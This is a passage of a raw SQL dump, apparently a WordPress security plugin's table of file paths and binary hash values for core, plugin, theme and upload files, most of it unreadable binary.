IJ�@!\r�Ʈ@9�Ҽ�','̛U�6�s�.t2�,c^*,ɯ��~/s(','',0,'?'),('@��.:�p`���@�O�','wp-content/plugins/wordpress-seo/js/dist/externals/helpers-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�.r3�Bˠ֚P�r�','a��Ok\n$��ӦRf�W+��v��b㠅���','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&� �','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@���3)���-x��M��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fa.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';[і�\no��L���C','0�����F�3zp����)�(��Gͳ�r_���P','',0,'?'),('@��C��E\'�O����','wp-includes/css/dist/widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����_R��j� �','�]A�k���̴.�8 aS%�HK���1w','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)\0�Q�N��#$|�','��t�Ϸ\0\re(x�T�n��_C�Q��=��K2U�C','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y` ���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�Z:���$ �p\Z{�9','wp-content/themes/vega/sample/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9F*�!\0R\"$�P��','��2ya�-����F�f�F;���:��H� ','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@�[�`X@f�ba�rkp','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/date-archives-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��9p�+��?�g','�JƐ�`�����ɍ�eC�Br���w�7)','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`3��0�h~�ݻ����h','�ZR\'��Z�w�$߃��_ɐxT�{-`��','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y�X��k�*v�>','n ~m6�����롁q��2�(vUqE�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&�� ��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A ��l�e8ߒߊ(\"��','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��y�����[~-�',' �:DBL�=Y�Y��wCk=zghi3 ����*�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Hr,O@��\Z.','4\'1z���3�u{�\rf�\"� ��7�\rɔ^^','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#��h�l��������\rk���','',0,'?'),('A\"~ی5)��N�W�n','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EKgf1�,%�����','̎ph�3���\0��{�\\��A-����Ke�f�','',0,'?'),('A+~/Ję4���$Y*��','wp-includes/block-supports/spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�wM�ӎA`ۿbkP','��4&x��R�Q��?����4~\"v,E��>N��T','',0,'?'),('A/hͳ$BQ��:����','wp-content/themes/twentynineteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP~�,Y��`sMu�k�0','��;�`� ��:�6�P��q�L�:*;��','',0,'?'),('A2GD���̇w^�^\Z{�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','β⭎�h���͵7�U','�@�Njh����a�בi��d���z\n=�','',0,'?'),('A4��r��ɽv���@','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/ResourceOwnerAccessTokenInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����f���z�~O','O\'a\Z��?*!�6үu���M������H','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ ���[q��˜P���k�','',0,'?'),('AT�yxhl|�4+��n�','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4 vHhg�BL','됤oϙ�,/����ɞq�?����s��CvF�','',0,'?'),('AỶ�k��{�v�r','wp-content/plugins/redirection/api/api-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q\r�$�:i��f','ϪVA��7.T��������1b\ZĽ���ޱ','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i9����_!��l-R','sԟ�lL!�#��y,�N)h��XLq0wb�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ra#˦\n�!����[','E��9r�,hsq�a`E�-ʖ���� F;�@(g�','',0,'?'),('A��jx=s�vb�2�n','wp-content/uploads/2019/09/water-sustainability-300x196.jpg',0,'�^���*j����\"','�^���*j����\"','�3����Ke �)$z�\Z[��b����y[���','',0,'?'),('A�X�\0�l�Ά7�KBh','wp-content/plugins/wordpress-seo/src/generated/assets/languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N8�(�_>�-��`��','ھ��OZ��@=��bSA6�+{�O\Z�.��','',0,'?'),('A����I7Y������','wp-content/plugins/redirection/locale/redirection-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�B\"m�䍢\0�^�.','1H뀷�q��z�*�ޭXkz�A]�lf','',0,'?'),('A��8V,�_O�X�4���','wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>5R7��L��\\','���_���J�0D@`�G���Νx,�3\r->','',0,'?'),('A�NSTo���+qD�H','wp-content/plugins/wordpress-seo/css/dist/filter-explanation-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1+��RM�;�','�s�xX��Ϲ�|c���4��s�3x:��[','',0,'?'),('A��_��z�Q�ՠ��','wp-content/plugins/wordfence/css/iptraf.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-�� �cq���WQ$8�','',0,'?'),('Aѓ`�˫yٝ�BS��','wp-content/uploads/2019/08/nature-3336524_960_720-350x220.jpg',0,'剰\Z5��}��җ','剰\Z5��}��җ','W`\0 `Yo��>�)_�]� ��MX��WA`�C�','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J<1/%$�J�=Δ�','��v����p eKK�7��9���8����������','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A���M�pH���gH�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('A���$h��՝`Q�a','wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�� P�Z�ݢ`Ef','��}���5�e�3��3��mhyD�Q(','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('B$�7K��8%�N�f�w','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-updraft-pre-smush-original.jpg',0,'l�]�\Z�VvwH�','l�]�\Z�VvwH�','�sJ7�>�s��HB�[�P��L��[','',0,'?'),('B\' `0��zynã|�','wp-content/plugins/wordpress-seo/src/integrations/estimated-reading-time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�D�iID��9�#�','��3�\0���{s����/s��9�*����','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('B_�-�Th�+`ä�R','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��N�x\\�\r�v/�','tG����ք��2�\ZF�]aY����Jb��p��','',0,'?'),('Bq����G.��w�%','wp-content/themes/vega/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R82��א���G�','�� �k���(��`��F�m�-U��T�!','',0,'?'),('Bs��塘T����L�=','wp-includes/blocks/calendar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��iw�hw�Z�1','5v���ɭ<�%�U��B#���5z�h]� ','',0,'?'),('Bt�al��]���L�O�','wp-includes/pomo/pomo/mo.php',0,'! /�\"۵�$=�iU�','! /�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('Bz�)���W@�r�<i\\','wp-includes/blocks/query-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0o�Ԯ�<�GTw8','���ϟ?��ɐj���A�>V\rou���','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȓ�Sd�9Q!\Z�p�3�','�.:�����2KS1�vG��HV','',0,'?'),('B��C3,���`whż��','wp-content/uploads/2019/06/fibre-optic-350x220.jpg',0,'_��~�.6[Ρ�z���k','_��~�.6[Ρ�z���k','��GKH�O{d�}_��rHq�FV�&5�V�^','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq�� �Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('B��k�l[�Ε~�՜','wp-content/uploads/2019/08/Green-Energy-768x432.jpg',0,'��1���ͺ�қ��I','��1���ͺ�қ��I','��\0��5^�ݟ�\\hEA���X���{�','',0,'?'),('B��%m�Oj~��� ���','wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�v�һ�K�:����','�2����\"+�Ԥ���+c�h��r%�3�5E','',0,'?'),('Cu��ѐ9@~H��Ե','wp-content/uploads/2019/09/gardening-350x220.jpg',0,'B����W?u��z���z','B����W?u��z���z','@8��,#�[X����ύ�V�0ח��\0�p��','',0,'?'),('C4��Ȝ��-�f�!-�','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=⎼��t�NR�','�@m�o��ܛMbrђ����$ �z�\r�2�K=','',0,'?'),('CK�J��6LAM�kV','wp-includes/blocks/post-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�P���^����v{','ɫ�ʴ��|��ns鋺�@Kg�?��]߳ysQ�','',0,'?'),('C^&�H~5�}z�O�?�','wp-content/uploads/2019/08/rent-150x150.jpg',0,'\r��\0��i���\r8g�','\r��\0��i���\r8g�','�6��)��m̀��FB�g�!m�44B5c','',0,'?'),('Cu|)�Y)�hȮ���$�','wp-content/uploads/2019/08/roof-150x150.jpg',0,'�Pd�ʄ!v����pL��','�Pd�ʄ!v����pL��','�H_E��0��p�H�-���դ�ͳϕ�A+<�','',0,'?'),('C{x7�X/wDž^%*�\'b','wp-content/themes/vega/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c �66�Z_r����','Ҋ]��ٜ��j����ӫn�>�v��)�V<','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rf�0��\nj\0i<�W��','NZ؋)_ྟ)I���F`[<�K�� �gm̳','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C�ms\n��X�]��K�T','wp-includes/blocks/search/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �g�A��v��d�4��','�iL%},D7T\Z�S���\'����z�Xwwf�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C���et�;>�h�˒1�','wp-content/plugins/wordpress-seo/languages/yoast-components-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\r�V,��=x��a>�','/.u��x��XF^[��c�1��K� uׅ99','',0,'?'),('C�9wVH���\"b��V#','wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qVO��%\n��N\nu','zk!N)�E����]���;!���Q��','',0,'?'),('C�����!y�6�㋼','wp-includes/blocks/buttons/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','əĜהT��c��˗|',')C45alJ��n)8���iK���ͿfL���','',0,'?'),('C�\"�@�7�t�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h2�nB�Z�JBo�L','TWe��5�$y���^,�f2��ٰ���U��?8','',0,'?'),('C��c&�*��pu,�','wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�t�:�����3_�,','Q�\r�2�n�][�8�@�:{�D�u��Ys$Ѻ�','',0,'?'),('C�]j�$��AR�-�\"','wp-content/languages/plugins/wordpress-seo-en_GB.po',0,'��]6TB)%��e��','��]6TB)%��e��','��]oF�K��\'�:�؞����w�r��8�x�ZB','',0,'?'),('C�P�{��|2�\\��44','wp-content/uploads/2019/09/planning-permission-garden-150x150.jpg',0,'���~�?�.{��s\0�','���~�?�.{��s\0�',',`�7�ܬF��ҍ�wH)\r����Tj�','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���EF?xO\0��','�wwRŎ���I�|s��o-o���8��t� ','',0,'?'),('D\'�%��S�6�>�{','wp-includes/js/dist/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l-� ŇƁ�','\r��#�\\!L��C����������5�>c:D\\','',0,'?'),('D (�,|����b?�L','wp-includes/blocks/query-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��*���l�:��\\w','��w9�C�1�\'�$�IN+��3ں�$�s','',0,'?'),('D�I�a��c�ᐸ�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/AuthorizationCode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RO���g���W��l','�+A�S�DY����d��ұ�/vLe̕3���','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D#q{ť���ԇb�','wp-includes/css/dist/customize-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W�M���j_��M�','\':\'��z]9#\r��cC�C�_)�L�e#w4cc���','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F ��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_�� �S%��GVJ','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"IA�+�Z�bQ��o*','������ه!�.6�{��O�l�J�[!�?x���','',0,'?'),('DQ#�u��nU\\ @�<�','wp-includes/blocks/page-list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��i�y��\rS��&g�','����`��j�]�q�\\ј��9�~t?�E���','',0,'?'),('DU}��<�D5�Y','wp-includes/block-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','go�l�o��\',�[�3L�','��3$c�2��\"t:u�bd�0(\rܑ:���D�','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('Du���UZ�v��A�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-bg_BG.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3C��M��F��\'��:','|��QO ���� B����d�˃�ޗ�0�#�n','',0,'?'),('Dx�ȳ)&47ܦң','wp-content/plugins/redirection/fileio/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"����>�?��}','˼��0y,s�?h{�|�hؠ\"Qv�����','',0,'?'),('D���u�\r��ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aի����� Lqw� �','��r��_�iQ� �a��R������+����','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�.ѥa/�y��8֦#�','wp-content/uploads/2019/10/plumber-350x220.jpg',0,'5e~e5�`ҏ�9Қ','5e~e5�`ҏ�9Қ','�\r�i����j\'���yDxDO���|�xZ���','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('D��+/��i�L�9;�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-ar.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��\0�}w��n�','��!R�Б0�Xs\0+�u�_@p<�����\\3O','',0,'?'),('D�<��{��i���','wp-content/plugins/redirection/models/redirect/redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���k���bک�w','V�LI��M���r�9�.\Z�Jt��di ��`��','',0,'?'),('DԘ�\Z��� zd�','wp-content/plugins/wordpress-seo/images/Yoast_Academy_video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^����H��]��]',' �j�k?�$�����\\��e�;?�XW��','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǡ�`5�����;��{�','{*F+�&,W�n\rF3�v�eaUP,�=�G�','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('Dܹ�����g��lv�/�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-tr_TR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���TЧ{��rA���',' 4�;�T����R곞�]õ�U�SW���K8�$ ','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�q(��t��ݣ˻','at�Á}(��0�oß%�3���p�u~�ĥ','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R l�','',0,'?'),('E\n����˼�Sd;�n�R','wp-content/plugins/wordpress-seo/css/dist/search-appearance-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��C���+A�e@�','w�Fty����@��A3��a��Ӟ�#B(�z','',0,'?'),('E4��D\'BI���_#s','wp-includes/blocks/tag-cloud/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�(�9�͝e\nj͟','.RU��px�էW:����L�c��?�\"k�y��','',0,'?'),('E3�\\S�\"F�קj��','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_CO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�C���8�Ff�=5Nyt','�HD ��[���б� #:�f��2','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XX�������`N`','��|t�r���Ԡ� \Z�;����:N���\ryP�','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[$ң�v͓�ר��B','4��t);F�A �s�A�#���|�����],','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('Ed�M\0*�>Է�M���','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/link-count-tools-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c���_8�W8{� �','��XU�8þx~�/�F�!�>]=���ڿU��','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('EuG|>/����u\Z�','wp-content/plugins/wordpress-seo/lib/abstract-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aBH4�W�Lo�Y�~g','�P�\r �k�o��SG2C��E�q�K$C\rz','',0,'?'),('E�b�����O5�k#��','wp-content/plugins/redirection/locale/json/redirection-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!8K=��伤���\Z',',/S�\"�M^�c�/2�4Gq����J���P�\r�','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E��n<�{�\n��t_dU','wp-content/uploads/2019/02/household-rubbish.jpg',0,'�G�}�\0q�el��d','�G�}�\0q�el��d',':���sj+��q��\Z�E��Xz\Z�]��','',0,'?'),('E�\rJh��\"3��&�I','wp-content/plugins/wordpress-seo/inc/health-check-curl-version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���G��u������*','��R[ח�Anmc��_\n���G�m2? F;�R','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6����臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�B�\r�+�]�}��','��+R7ġU`�D�k���ɁVB�Ҫ\r���|�','',0,'?'),('E���s=�]�����=a','wp-includes/blocks/post-template/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�ؗ�m�UK�ڵ�@K','-x/r�] 